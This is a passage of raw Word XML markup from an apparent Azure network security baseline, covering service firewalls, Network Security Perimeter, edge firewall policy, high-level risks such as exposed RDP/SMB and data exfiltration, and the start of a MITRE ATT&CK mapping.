          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Apply network security group (NSG) rules to the service's subnet to restrict inbound and outbound traffic, implementing </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00465B6F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>least-privilege</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00465B6F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> access by allowing only necessary communication to specific destinations (e.g., database subnets, storage endpoints) while denying all other traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D463A5" w14:textId="7753B98F" w:rsidR="00557D6A" w:rsidRDefault="00557D6A" w:rsidP="004F1930">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>NS-2.3: Configure service native firewall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDC8E78" w14:textId="25775696" w:rsidR="00465B6F" w:rsidRPr="00DD2377" w:rsidRDefault="00465B6F" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Segoe UI"/>
          <w:color w:val="161616"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD2377">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Segoe UI"/>
          <w:color w:val="161616"/>
        </w:rPr>
        <w:t>Service-level firewalls provide defense-in-depth protection by restricting network access at the resource level, complementing network-layer controls with application-specific security boundaries. These native firewall capabilities enable organizations to limit exposure to specific IP ranges or virtual networks while completely disabling public access when appropriate, reducing attack surface without requiring complex network topology changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717C1D42" w14:textId="40ACE424" w:rsidR="006829B1" w:rsidRPr="00E53977" w:rsidRDefault="006829B1" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Configure service firewalls to restrict access</w:t>
      </w:r>
      <w:r w:rsidR="00465B6F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13613311" w14:textId="26A01609" w:rsidR="006829B1" w:rsidRPr="00E53977" w:rsidRDefault="006829B1" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Enable service firewall features:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EC8497" w14:textId="09038B74" w:rsidR="006829B1" w:rsidRPr="00E53977" w:rsidRDefault="00623A9C" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>For services supporting native firewalls (e.g., Azure Storage, Azure SQL Database, Azure Key Vault), enable firewall functionality</w:t>
      </w:r>
      <w:r w:rsidR="00422B42">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00422B42" w:rsidRPr="00422B42">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>either during resource creation or on existing resources to control which networks can access the service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B049282" w14:textId="2FAD78E5" w:rsidR="00623A9C" w:rsidRPr="00E53977" w:rsidRDefault="00623A9C" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Define IP-based or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>VNet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>-based rules</w:t>
      </w:r>
      <w:r w:rsidR="00BA2E69" w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A996DF" w14:textId="38FACE00" w:rsidR="001431B9" w:rsidRPr="006851E3" w:rsidRDefault="00BA2E69" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006851E3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Configure firewall rules to allow access only from specific public IP ranges (e.g., corporate office networks) or specific Azure virtual network subnets</w:t>
      </w:r>
      <w:r w:rsidR="00422B42" w:rsidRPr="00422B42">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>, implementing least-privilege access by denying all other sources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541FD173" w14:textId="4748B63F" w:rsidR="007B5FC1" w:rsidRDefault="007B5FC1" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Disable public access when possible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F5A7E5" w14:textId="5F69E683" w:rsidR="00422B42" w:rsidRPr="00E53977" w:rsidRDefault="00422B42" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00422B42">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>When services require access only from private networks, use the toggle option to completely disable public network access, ensuring the service is unreachable from the internet regardless of IP-based rules.</w:t>
      </w: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rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Implement Network Security Perimeter to secure PaaS resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785903D4" w14:textId="4B3AFBBC" w:rsidR="00FD455C" w:rsidRDefault="00FD455C" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Create and associate resources</w:t>
      </w:r>
      <w:r w:rsidR="006F5894" w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE85170" w14:textId="0A73F990" w:rsidR="00422B42" w:rsidRPr="00E53977" w:rsidRDefault="00422B42" w:rsidP="00BC6158">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00422B42">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Establish a </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00422B42">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Arial"/>
          </w:rPr>
          <w:t>network security perimeter</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00422B42">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and add </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:anchor="onboarded-private-link-resources" w:history="1">
        <w:r w:rsidRPr="00422B42">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Arial"/>
          </w:rPr>
          <w:t>supported PaaS resources</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00422B42">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Azure Storage, SQL Database, Key Vault, Event Hubs, Cosmos DB) through resource associations, enabling intra-perimeter communication where associated resources can freely communicate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCC4A47" w14:textId="75A53F7C" w:rsidR="0073568C" w:rsidRDefault="0073568C" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Configure access modes and rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC15B84" w14:textId="49415D88" w:rsidR="00422B42" w:rsidRPr="00465B6F" w:rsidRDefault="00422B42" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00465B6F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Start with Transition mode to understand access patterns before transitioning to Enforced mode for maximum protection. Define explicit inbound and outbound access rules using IP addresses, subscriptions, or FQDNs to control traffic outside the perimeter while maintaining default-deny posture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5048C415" w14:textId="603F0630" w:rsidR="003031FD" w:rsidRDefault="003031FD" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Enable monitoring and Private Link integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110A498B" w14:textId="364BD782" w:rsidR="00422B42" w:rsidRPr="00E53977" w:rsidRDefault="00422B42" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00422B42">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Configure </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="00422B42">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Arial"/>
          </w:rPr>
          <w:t>diagnostic logs</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00422B42">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to capture access attempts and policy violations. Private endpoint traffic is automatically allowed into the perimeter, complementing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00422B42">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>VNet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00422B42">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>-to-PaaS connectivity with perimeter-level data exfiltration controls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057C4C98" w14:textId="36C26CEF" w:rsidR="008448D3" w:rsidRPr="00E53977" w:rsidRDefault="0030648E" w:rsidP="00575260">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc242449469"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>NS-3: Deploy firewall at the edge of enterprise network</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="06413D56" w14:textId="03EDAEAF" w:rsidR="0030648E" w:rsidRPr="00E53977" w:rsidRDefault="0030648E" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Security principl</w:t>
      </w:r>
      <w:r w:rsidR="000317FD" w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E520240" w14:textId="26139D7B" w:rsidR="007F57DB" w:rsidRDefault="007F57DB" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Use firewall at the network edge to perform advanced filtering on network traffic to and from external networks, such as the internet, and between internal network segments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B70AF6" w14:textId="604BCFAF" w:rsidR="00422B42" w:rsidRDefault="00422B42" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00422B42">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>At a minimum, firewall policy should include</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261A3557" w14:textId="77777777" w:rsidR="00422B42" w:rsidRPr="00422B42" w:rsidRDefault="00422B42" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="343"/>
        </w:numPr>
        <w:ind w:left="1530"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00422B42">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Block </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00422B42">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>known</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00422B42">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> bad IP addresses and sites.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567D1BD4" w14:textId="77777777" w:rsidR="00422B42" w:rsidRPr="00422B42" w:rsidRDefault="00422B42" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="343"/>
        </w:numPr>
        <w:ind w:left="1530"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00422B42">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Restrict high-risk protocols, such as remote management protocols and intranet protocols at edge networks to prevent unauthorized access or lateral movement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A169F6" w14:textId="77777777" w:rsidR="00422B42" w:rsidRPr="00422B42" w:rsidRDefault="00422B42" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="343"/>
        </w:numPr>
        <w:ind w:left="1530"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00422B42">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Enforce application rules to allow only approved external destinations and block unauthorized or risky sites.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D5552B" w14:textId="4E6E87BC" w:rsidR="007F57DB" w:rsidRPr="00E53977" w:rsidRDefault="007F57DB" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:r w:rsidR="00931F18" w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>of mitigating</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637F3E0F" w14:textId="3ECB2868" w:rsidR="00067643" w:rsidRDefault="00067643" w:rsidP="00BA39EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Malware and phishing via malicious domains/I</w:t>
      </w:r>
      <w:r w:rsidR="00B07444" w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C299CFA" w14:textId="77777777" w:rsidR="00BA39EE" w:rsidRDefault="00BA39EE" w:rsidP="00BA39EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Unauthorized access via exposed protocols</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCBFB10" w14:textId="77777777" w:rsidR="00BA39EE" w:rsidRPr="00E53977" w:rsidRDefault="00BA39EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="344"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00422B42">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Publicly accessible protocols like RDP (TCP 3389) or SMB (TCP 445) enable attackers to gain unauthorized entry, compromising system integrity through exploits such as brute-force or CVE-targeted attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5836CA7C" w14:textId="2D26EFD8" w:rsidR="00422B42" w:rsidRPr="00E53977" w:rsidRDefault="00422B42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="344"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00422B42">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Malicious domains and IPs facilitate malware delivery or phishing campaigns, endangering endpoints and sensitive data through command-and-control or social engineering attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF8872B" w14:textId="4E0E342D" w:rsidR="00B07444" w:rsidRDefault="00B07444" w:rsidP="00BA39EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Data exfiltration through unrestricted outbound traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67752CCC" w14:textId="685B99A6" w:rsidR="00046AE1" w:rsidRPr="00465B6F" w:rsidRDefault="00422B42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="344"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00465B6F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Uncontrolled egress to unapproved destinations allows adversaries to exfiltrate sensitive data, risking breaches and compliance violations via covert channels like HTTPS POSTs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A1B0B0" w14:textId="52872BDE" w:rsidR="00971DA7" w:rsidRDefault="00971DA7" w:rsidP="00BA39EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Lateral movement due to poor segmentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091DF29A" w14:textId="784B5DA6" w:rsidR="00465B6F" w:rsidRPr="00BA39EE" w:rsidRDefault="00422B42" w:rsidP="00465B6F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="344"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA39EE">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Insufficient network segmentation permits attackers to pivot internally, exploiting inter-segment traffic (e.g., SMB, Kerberos) to propagate from compromised systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51190E71" w14:textId="2FF65278" w:rsidR="00971DA7" w:rsidRDefault="00971DA7" w:rsidP="00BA39EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Vulnerabilities from untrusted applications/URLs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533B3B20" w14:textId="71096138" w:rsidR="00422B42" w:rsidRPr="00E53977" w:rsidRDefault="00422B42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="344"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00422B42">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Access to risky or untrusted URLs and applications increases exposure to exploits, elevating incident risks and non-compliance with regulatory standards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B3B723" w14:textId="59490208" w:rsidR="00931F18" w:rsidRPr="00E53977" w:rsidRDefault="00931F18" w:rsidP="00BA39EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291413EB" w14:textId="76383C75" w:rsidR="00087977" w:rsidRDefault="00087977" w:rsidP="00BA39EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
